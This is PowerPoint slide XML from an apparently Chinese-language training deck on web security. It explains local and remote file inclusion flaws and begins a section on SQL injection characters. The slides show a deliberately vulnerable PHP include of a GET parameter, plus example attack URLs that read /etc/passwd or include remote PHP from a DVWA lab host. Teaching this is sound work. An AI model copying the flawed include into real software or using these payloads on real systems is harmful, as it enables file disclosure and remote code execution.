              <p:tags r:id="rId10"/>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D933B0D8-5EC4-DA2B-0D83-8E77AB0A6438}"/>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7A9E0B0B-2705-78C7-9E88-D8D904C571B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A6511533-03EB-CAF0-8906-0FC02A34AC3B}"/>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666BA39A-E68D-C985-37DA-BBDFFD19818A}"/>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893BA17-0AD5-6577-4E2E-247F6599D9A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId11"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1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7086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04</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>  文件包含漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1577103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文件包含</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3519618"/>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在开发</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>应用时，开发人员通常会将一些重复使用的代码写到单个文件中，再通过文件包含，将这些单个文件中的代码插入到其它需要用到它们的页面中。</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文件包含可以极大的提高应用开发的效率，减少开发人员的重复工作，有利于代码的维护与版本的更新。</a:t>
            </a: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19"/>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应用场景</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F051D6C-82BF-47CC-51ED-9D421B430D15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6450969" y="1725578"/>
            <a:ext cx="4824536" cy="2365456"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>文件包含主要应用于：</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配置文件</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重复使用的函数</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重复使用的板块</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25000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>具有相同框架的不同功能</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="426589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839416" y="1147684"/>
            <a:ext cx="2646878"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本地文件包含漏洞</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839416" y="1700808"/>
            <a:ext cx="4824536" cy="1211357"/>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如果被包含的文件储存在服务器上，那么对于应用来说，被包含的文件就在本地，就称之为本地文件包含漏洞。 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="文本框 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50A5A436-E080-2886-BB19-27CCD35A409E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6456040" y="1147684"/>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远程文件包含漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC34A84A-6192-1DAC-C45A-185FD0EB245B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6456040" y="1698120"/>
            <a:ext cx="4896544" cy="1791965"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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如果</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的配置</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allow_url_fopen</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和</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allow_url_include</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设置为</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ON</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include/require</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等包含函数可以加载远程文件，如果远程文件没经过严格的过滤，导致了执行恶意文件的代码，就是远程文件包含漏洞。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="940205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3" y="1725578"/>
            <a:ext cx="4974269" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>$filename = $_GET[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>'filename’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>($filename);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Menlo"/>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955BAE50-C6A7-2CA4-E16D-39041B1317FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6313487" y="1725578"/>
            <a:ext cx="5104570" cy="1211294"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>fileInclude.php?filename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>=/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>/passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>访问，可以获取到系统中其他文件的内容，</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a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>这种漏洞也叫作目录遍历漏洞。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="800000"/>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433F794-C8F4-B318-73DB-E09F3D8A0940}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6450969"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本地文件包含漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88314B79-292D-2840-1B25-0D667AFCFAD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6385495" y="3126508"/>
            <a:ext cx="4967089" cy="2763298"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2770798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3" y="1725578"/>
            <a:ext cx="4974269" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>$filename = $_GET[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>'filename’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>($filename);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Menlo"/>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955BAE50-C6A7-2CA4-E16D-39041B1317FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6313487" y="1725578"/>
            <a:ext cx="5104570" cy="1445717"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pP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在</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allow_url_fopen</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=On</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allow_url_include</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=On</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前提下，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>fileInclude.php?filename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>=http://192.168.180.135/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>login.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>访问，可以执行远程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>：</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433F794-C8F4-B318-73DB-E09F3D8A0940}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6450969"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远程文件包含漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{292DC250-5C88-F61F-DF66-4DF5D40C7F1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6384032" y="3201375"/>
            <a:ext cx="4967088" cy="3021336"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="49743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200" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>       SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>注入漏洞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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA50D33C-2835-315B-9A1B-4F0C95C53F96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="944961" y="1778753"/>
            <a:ext cx="4791000" cy="468312"/>
            <a:chOff x="766765" y="1052512"/>
            <a:chExt cx="5007618" cy="603084"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="矩形 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9AA97A7-487A-A28A-FE80-ECD0620AFC64}"/>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Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>' '</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A868A3EC-5BBD-136A-DBB3-9F0DD391EA49}"/>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字符串指示器</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="文本框 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEABE2FF-D239-D3C1-B5D6-4036073371AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839416" y="1118601"/>
            <a:ext cx="1994457"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常用字符</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="矩形 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C465BE9A-9FB8-794A-AE80-5B408C4A3F02}"/>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2F918F6-99BC-23AA-7C49-D3D344C29CB6}"/>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0440037-522B-F94A-4FAF-667D855B1DCE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6372381" y="1118601"/>
            <a:ext cx="1994457" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="non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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>常用字符</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="30" name="组合 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{931AD1FA-B2BC-CA22-F10F-C1600D31AD1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="944961" y="2445551"/>
            <a:ext cx="4791000" cy="468312"/>
            <a:chOff x="766765" y="1052512"/>
            <a:chExt cx="5007618" cy="603084"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="矩形 30">
              <a:extLst>
